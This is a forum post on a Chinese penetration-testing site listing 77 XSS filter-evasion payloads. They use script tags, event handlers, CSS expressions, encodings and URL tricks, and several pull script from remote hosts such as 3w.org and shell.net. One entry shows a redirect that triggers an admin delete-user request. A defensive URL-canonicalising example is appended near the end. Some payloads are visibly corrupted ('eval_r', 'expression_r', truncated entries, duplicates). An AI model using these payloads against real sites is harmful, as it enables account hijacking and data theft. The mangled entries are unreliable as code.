中国网络渗透测试联盟

Title: XSS cross-site scripting attack roundup

Author: admin    Time: 2012-9-5 14:56
Title: XSS cross-site scripting attack roundup
It seems t00ls has rather little material on XSS, so I saw something good and copied it over; not sure whether any of you need to bookmark it.

(1) Plain XSS JavaScript injection
<SCRIPT SRC=http://3w.org/XSS/xss.js></SCRIPT>

(2) IMG tag XSS using a JavaScript command
<SCRIPT SRC=http://3w.org/XSS/xss.js></SCRIPT>

(3) IMG tag, no semicolon, no quotes
<IMG SRC=javascript:alert('XSS')>

(4) IMG tag, case-insensitive
<IMG SRC=JaVaScRiPt:alert('XSS')>

(5) HTML encoding (semicolons required)
<IMG SRC=javascript:alert("XSS")>

(6) Malformed IMG tag
<IMG """><SCRIPT>alert("XSS")</SCRIPT>">

(7) fromCharCode (calculator)
<IMG SRC=javascript:alert(String.fromCharCode(88,83,83))>

(8) UTF-8 Unicode encoding (calculator)
<IMG SRC=jav..omitted..S')>

(9) 7-bit UTF-8 Unicode encoding, without semicolons (calculator)
<IMG SRC=jav..omitted..S')>

(10) Hex encoding, also without semicolons (calculator)
<IMG SRC=&#x6A&#x61&#x76&#x61..omitted..&#x58&#x53&#x53&#x27&#x29>

(11) Embedded tab, splitting the JavaScript
<IMG SRC="jav ascript:alert('XSS');">

(12) Embedded encoded tab, splitting the JavaScript
<IMG SRC="jav ascript:alert('XSS');">

(13) Embedded newline
<IMG SRC="jav ascript:alert('XSS');">

(14) Embedded carriage return
<IMG SRC="jav ascript:alert('XSS');">

(15) Multi-line embedded JavaScript injection; this is an extreme XSS example
<IMG SRC="javascript:alert('XSS')">

(16) Working around character limits (requires the same page)
<script>z='document.'</script>
<script>z=z+'write("'</script>
<script>z=z+'<script'</script>
<script>z=z+' src=ht'</script>
<script>z=z+'tp://ww'</script>
<script>z=z+'w.shell'</script>
<script>z=z+'.net/1.'</script>
<script>z=z+'js></sc'</script>
<script>z=z+'ript>")'</script>
<script>eval_r(z)</script>

(17) Null character
perl -e 'print "<IMG SRC=java\0script:alert(\"XSS\")>";' > out

(18) Null character 2. Null characters basically have no effect domestically, because there is nowhere to make use of them
perl -e 'print "<SCR\0IPT>alert(\"XSS\")</SCR\0IPT>";' > out

(19) Spaces and meta characters before the JavaScript in the IMG tag
<IMG SRC="   javascript:alert('XSS');">

(20) Non-alpha-non-digit XSS
<SCRIPT/XSS SRC="http://3w.org/XSS/xss.js"></SCRIPT>

(21) Non-alpha-non-digit XSS 2
<BODY onload!#$%&()*~+-_.,:;?@[/|\]^`=alert("XSS")>

(22) Non-alpha-non-digit XSS 3
<SCRIPT/SRC="http://3w.org/XSS/xss.js"></SCRIPT>

(23) Double open brackets
<<SCRIPT>alert("XSS");//<</SCRIPT>

(24) No closing script tag (Firefox and similar browsers only)
<SCRIPT SRC=http://3w.org/XSS/xss.js?<B>

(25) No closing script tag 2
<SCRIPT SRC=//3w.org/XSS/xss.js>

(26) Half-open HTML/JavaScript XSS
<IMG SRC="javascript:alert('XSS')"

(27) Double open angle brackets
<iframe src=http://3w.org/XSS.html <

(28) No single quotes, double quotes or semicolons
<SCRIPT>a=/XSS/
alert(a.source)</SCRIPT>

(29) Escape-filtered JavaScript
\";alert('XSS');//

(30) Closing the TITLE tag
</TITLE><SCRIPT>alert("XSS");</SCRIPT>

(31) Input Image
<INPUT SRC="javascript:alert('XSS');">

(32) BODY Image
<BODY BACKGROUND="javascript:alert('XSS')">

(33) BODY tag
<BODY('XSS')>

(34) IMG Dynsrc
<IMG DYNSRC="javascript:alert('XSS')">

(35) IMG Lowsrc
<IMG LOWSRC="javascript:alert('XSS')">

(36) BGSOUND
<BGSOUND SRC="javascript:alert('XSS');">

(37) STYLE sheet
<LINK REL="stylesheet" HREF="javascript:alert('XSS');">

(38) Remote stylesheet
<LINK REL="stylesheet" HREF="http://3w.org/xss.css">

(39) List-style-image (list style)
<STYLE>li {list-style-image: url("javascript:alert('XSS')");}</STYLE><UL><LI>XSS

(40) IMG VBscript
<IMG SRC='vbscript:msgbox("XSS")'></STYLE><UL><LI>XSS

(41) META link URL
<META HTTP-EQUIV="refresh" CONTENT="0; URL=http://;URL=javascript:alert('XSS');">

(42) Iframe
<IFRAME SRC="javascript:alert('XSS');"></IFRAME>

(43) Frame
<FRAMESET><FRAME SRC="javascript:alert('XSS');"></FRAMESET>

(44) Table
<TABLE BACKGROUND="javascript:alert('XSS')">

(45) TD
<TABLE><TD BACKGROUND="javascript:alert('XSS')">

(46) DIV background-image
<DIV STYLE="background-image: url(javascript:alert('XSS'))">

(47) DIV background-image with extra characters appended (1-32&34&39&160&8192-8&13&12288&65279)
<DIV STYLE="background-image: url(javascript:alert('XSS'))">

(48) DIV expression
<DIV STYLE="width: expression_r(alert('XSS'));">

(49) STYLE attribute with a split-up expression
<IMG STYLE="xss:expression_r(alert('XSS'))">

(50) Anonymous STYLE (made of an open angle bracket followed by a letter)
<XSS STYLE="xss:expression_r(alert('XSS'))">

(51) STYLE background-image
<STYLE>.XSS{background-image:url("javascript:alert('XSS')");}</STYLE><A CLASS=XSS></A>

(52) IMG STYLE method
exppression(alert("XSS"))'>

(53) STYLE background
<STYLE><STYLE type="text/css">BODY{background:url("javascript:alert('XSS')")}</STYLE>

(54) BASE
<BASE HREF="javascript:alert('XSS');//">

(55) EMBED tag: you can embed Flash that contains XSS
<EMBED SRC="http://3w.org/XSS/xss.swf" ></EMBED>

(56) Using ActionScript inside Flash, you can mix in your XSS code
a="get";
b="URL(\"";
c="javascript:";
d="alert('XSS');\")";
eval_r(a+b+c+d);

(57) XML namespace. The HTC file must be on the same server as your XSS carrier
<HTML xmlns:xss>
<?import namespace="xss" implementation="http://3w.org/XSS/xss.htc">
<xss:xss>XSS</xss:xss>
</HTML>

(58) If your JS is filtered, you can add JS code inside an image and use that
<SCRIPT SRC=""></SCRIPT>

(59) IMG embedded command; can execute arbitrary commands
<IMG SRC="http://www.XXX.com/a.php?a=b">

(60) IMG embedded command (a.jpg on the same server)
Redirect 302 /a.jpg http://www.XXX.com/admin.asp&deleteuser

(61) Bypassing symbol filtering
<SCRIPT a=">" SRC="http://3w.org/xss.js"></SCRIPT>

(62)
<SCRIPT =">" SRC="http://3w.org/xss.js"></SCRIPT>

(63)
<SCRIPT a=">" " SRC="http://3w.org/xss.js"></SCRIPT>

(64)
<SCRIPT "a='>'" SRC="http://3w.org/xss.js"></SCRIPT>

(65)
<SCRIPT a=`>` SRC="http://3w.org/xss.js"></SCRIPT>

(66)
<SCRIPT a=">'>" SRC="http://3w.org/xss.js"></SCRIPT>

(67)
<SCRIPT>document.write("<SCRI");</SCRIPT>PT SRC="http://3w.org/xss.js"></SCRIPT>

(68) URL bypass
<A HREF="http://127.0.0.1/">XSS</A>

(69) URL encoding
<A HREF="http://3w.org">XSS</A>

(70) IP in decimal
<A HREF="http://3232235521">XSS</A>

(71) IP in hexadecimal
<A HREF="http://0xc0.0xa8.0x00.0x01">XSS</A>

(72) IP in octal
<A HREF="http://0300.0250.0000.0001">XSS</A>

(73) Mixed encoding
<A HREF="h
tt p://6 6.000146.0x7.147/">XSS</A>

(74) Omitting [http:]
<A HREF="//www.google.com/">XSS</A>

(75) Omitting [www]
<A HREF="http://google.com/">XSS</A>

(76) Absolute dot, absolute DNS
<A HREF="http://www.google.com./">XSS</A>

(77) javascript link
<A HREF="javascript:document.location='http://www.google.com/'">XSS</A>
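As an added example that is not part of the original post: a defender-side URL attribute canonicaliser, written for this page, that applies the decoding and stripping a browser performs before it interprets a URL scheme, so the evasions in entries (4) to (14), (17) and (19) all collapse to a plain javascript: prefix that an allowlist check then rejects. The function names and sample strings are constructed, not from the post or any library.

```javascript
// Added example (not from the original post): canonicalise an attribute value the
// way a browser would before a URL scheme check, so the evasions in entries
// (4)-(14), (17) and (19) all collapse to "javascript:". Names and samples are
// constructed for this example.

const ALLOWED_SCHEMES = ["http", "https", "mailto"];

// Decode decimal and hex numeric character references. The trailing ';' is
// optional, which is exactly what entries (9) and (10) rely on.
function decodeNumericEntities(s) {
  return s.replace(/&#(x[0-9a-f]+|[0-9]+);?/gi, (match, num) => {
    const hex = num[0].toLowerCase() === "x";
    const cp = parseInt(hex ? num.slice(1) : num, hex ? 16 : 10);
    return cp > 0x10ffff ? match : String.fromCodePoint(cp);
  });
}

// Browsers drop ASCII tab/LF/CR anywhere in a URL and ignore leading C0 controls
// and spaces (entries (11)-(14) and (19)); NUL is dropped here too because the
// legacy parsers targeted by entry (17) ignored it. Lower-casing handles (4).
function canonicalizeUrlAttr(raw) {
  return decodeNumericEntities(raw)
    .replace(/[\t\n\r\0]/g, "")
    .replace(/^[\x00-\x20]+/, "")
    .toLowerCase();
}

// Allowlist check: a scheme-less (relative) reference or an allowed scheme passes;
// anything else, including javascript:, vbscript: and data:, is rejected.
function isAllowedUrl(raw) {
  const url = canonicalizeUrlAttr(raw);
  const m = /^([a-z][a-z0-9+.-]*):/.exec(url);
  return m === null || ALLOWED_SCHEMES.includes(m[1]);
}

// Constructed samples modelled on entries (4), (9), (10), (13), (17) and (19),
// plus one benign URL; classifySamples() returns [sample, allowed] pairs.
const SAMPLES = [
  "JaVaScRiPt:alert('XSS')",
  "&#106&#97&#118&#97&#115&#99&#114&#105&#112&#116&#58alert('XSS')",
  "&#x6A&#x61&#x76&#x61&#x73&#x63&#x72&#x69&#x70&#x74&#x3A;alert('XSS')",
  "jav\tascript:alert('XSS')",
  "jav\u0000ascript:alert('XSS')",
  "   javascript:alert('XSS')",
  "https://example.com/a.js",
];

function classifySamples() {
  return SAMPLES.map((s) => [s, isAllowedUrl(s)]);
}
```

Only the last sample passes; the point is that the check runs on the canonical form, not on the raw attribute text that a substring filter would see.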




Welcome to 中国网络渗透测试联盟 (https://cobjon.com/) Powered by Discuz! X3.2